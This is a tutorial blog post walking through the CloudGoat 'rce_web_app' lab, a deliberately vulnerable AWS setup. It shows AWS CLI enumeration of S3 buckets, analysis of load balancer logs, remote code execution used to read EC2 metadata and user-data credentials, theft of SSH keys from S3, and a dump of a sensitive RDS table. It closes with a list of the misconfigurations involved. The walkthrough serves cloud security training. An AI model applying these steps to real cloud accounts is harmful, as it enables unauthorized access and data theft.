Cloud security

CloudGoat walkthrough series: Remote code execution

Mosimilolu Odusanya
January 28, 2021 by
Mosimilolu Odusanya

This is the sixth in our walkthrough series of CloudGoat scenarios. CloudGoat is a “vulnerable by design” AWS deployment tool designed by Rhino Security Labs. It is used to deploy a vulnerable set of AWS resources and is designed to teach and test cloud security penetration testing via issues commonly seen in real-life environments.

This walkthrough assumes you have CloudGoat set up on your Kali Linux. You can use our post (Working with CloudGoat: The “vulnerable by design” AWS environment) as a guide in deploying it.

Learn Cloud Security

Learn Cloud Security

Get hands-on experience with cloud service provider security, cloud penetration testing, cloud security architecture and management, and more.

Scenario summary

Starting as the IAM user Lara, the attacker explores a load balancer and S3 bucket for clues to vulnerabilities. This leads to an RCE exploit on a vulnerable web app, which exposes confidential files and culminates in access to the scenario’s goal: a highly secured RDS database instance.

Alternatively, the attacker may start as the IAM user McDuck and enumerate S3 buckets, eventually leading to SSH keys that grant direct access to the EC2 server and the database beyond.

Based on the scenario summary, we can tell that there are two IAM users and they both lead to the same goal.

Goal: Gain access to sensitive information stored in the RDS database instance.

Walkthrough

To deploy the resources for each scenario on AWS:

./cloudgoat.py create rce_web_app

Deploying the resources gives us the access key and secret key for Lara and McDuck.

Lara’s path

1. Save the credential to a profile – Lara.

aws configure --profile Lara

2. Perform reconnaissance on the user “Lara” to see what privileges the user has. You can do this by enumerating the policies and permissions attached to the user.

We tried running the usual commands: “list-user-policies”, “list-attached-user-policies”, “list-roles”. We noticed we were unauthorized to carry out those actions.

3. Since we are unable to get more information about Lara, we perform a recon on the S3 buckets. We noticed Lara has permission to list buckets.

aws s3 ls --profile <insert profile name here>

4. We notice three buckets. We try to access all three buckets to see what information they contain. We are not authorized to access two of the three buckets. The last bucket seems to contain the logs of an AWS service.

aws s3 ls <insert s3 bucket name here> --profile <insert profile name here>

5. Exploring the log folder reveals that it contains the logs of an elastic load balancer. We download the log file and analyze it.

aws s3 ls s3://<insert s3 bucket name here> --recursive --profile <insert profile name here>

aws s3 cp s3://<insert s3 bucket name here/<log file name> ./<insert new file name here>.txt --profile <insert profile name here>.

6. Opening the log file reveals it is an HTTP log file. However, it is not easy to read.

There are two ways to analyze this log file.

1. Using grep to find and extract URLs from the log file.

cat <insert file name here> | grep -Eo ‘(http|https)://[a-zA-Z0-9./?=_%:-]*’

2. Using an ELB log analyzer: I found this log analyzer for AWS Elastic Load Balancer by Ozantunca on GitHub and installed it.

elb-log-analyzer <insert log name here>

We try accessing the webpage, as it has been accessed multiple times via different ELBs. It is unavailable.

7. We try to identify whether there’s a load balancer or EC2 instance deployed and if we have access to it.

aws ec2 describe-load-balancers --region us-east-1 --profile <insert profile

We are also not sure what kind of elastic load balancer is deployed to the environment. We assume it’s an application load balancer, since we have a web server deployed on the EC2 instance (port 80 is enabled on the server).

aws elbv2 describe-load-balancers --region us-east-1 --profile <insert profile name here>

8. Let’s visit the public IP address of the elastic load balancer. It references a secret URL.

9. Remember the .html webpage identified in the ELB log file? We try accessing it via the public IP of the elastic load balancer.

10. We try different commands. We note that it has a remote code execution vulnerability and the commands are running as root.

With this, we try querying the instance metadata API to obtain the credentials to reveal the role name of the EC2 instance. The instance metadata contains data about the EC2 instance that you can use to configure or manage the running instance.

We also try querying the user data to see if there were any user data specified during the creation of the EC2 instance.

The user data contains commands and credentials to the RDS instance (with table “sensitive information”). We try connecting to the RDS instance and see what happens.

McDuck’s path

1. Save the credential to a profile – McDuck.

aws configure --profile McDuck

2. Perform reconnaissance on the user “McDuck” to see what privileges the user has by enumerating the policies and permissions attached to the user.

aws configure --profile McDuck

We tried running the usual commands: “list-user-policies”, “list-attached-user-policies” and “list-roles”. We noticed we were unauthorized to carry out those actions.

3. Since we are unable to get more information about the user and the role assigned. We perform a recon on the S3 buckets and notice that McDuck has permission to list buckets.

aws s3 ls --profile <insert profile name here>

4. We notice three S3 buckets. We try to access all three S3 buckets to see what information they contain. We are unauthorized to access two of the three buckets.

aws s3 ls <insert s3 bucket name here> --profile <insert profile name here>

5. We have access to the keystore bucket, which contains SSH keys. We download the files to our system.

aws s3 ls <insert s3 bucket name here> --profile <insert profile name here>

6. We try to identify if there is a load balancer or EC2 instance deployed and if we have access to it. It’s the same EC2 instance and load balancer identified in Lara’s Path. But this time we have an SSH key for the EC2 instance. So we try connecting to the EC2 instance. But first, change the permission of the SSH key.

chmod 700 cloudgoat

7. Using the key pair, we login to the EC2 instance.

ssh -i cloudgoat ubuntu@<insert public IP of the EC2 Instance here>

8. Install AWS CLI.

sudo apt-get install awscli

9. Try accessing the S3 buckets again to see if we have permission.

aws s3 ls

10. We have access to the last S3 bucket and it contains a file called “db.txt”.

aws s3 ls s3://<insert s3 bucket name here>

11. Download the file to our system.

aws s3 cp s3://<insert s3 bucket name here>/<file name>

We open the file to see what it contains.

cat file name

We have the same credentials to the RDS instance from Lara’s path.

12. We try connecting to the RDS instance using this credential, but we need the address of the RDS instance.

aws rds describe-db-instances –-region us-east-1

13. Connect to the RDS Instance.

psql postgresql://<username>:<password>@<address of the RDS instance>:5432/<DB name>

14. List the tables in the RDS Instance.

\dt

15. List the content of the table “sensitive_information”.

SELECT * FROM sensitive_information.

To destroy the resources created during this lab:

./cloudgoat.py destroy rce_web_app

Learn Cloud Security

Learn Cloud Security

Get hands-on experience with cloud service provider security, cloud penetration testing, cloud security architecture and management, and more.

Summary

In this scenario, we were able to exploit a number of misconfigurations and bad practices to gain access to the sensitive data.

  1. Access to the elastic load balancer log files, which led us to the secret URL. This should be restricted to a need-to-know basis.
  2. Remote code execution vulnerability on the web application, which allowed us to run commands on the EC2 Instance as root granting us access to sensitive information.
  3. Access to the user data in the EC2 instance, which granted us access to the RDS Instance.
  4. SSH keys were stored in an S3 bucket and used to gain access to the EC2 instance.
  5. Credentials (user name and password) to the RDS instance were stored in a text file.

 

Sources

AWS CLI Command Reference - IAM, AWS

Well, that escalated quickly, Bishop Fox

AWS IAM Privilege Escalation Methods, Rhino Security Labs

ELB Log Analyzer, GitHub

Mosimilolu Odusanya
Mosimilolu Odusanya

Mosimilolu (or 'Simi') works as a full-time cybersecurity consultant, specializing in privacy and infrastructure security. Outside of work, her passions includes watching anime and TV shows and travelling.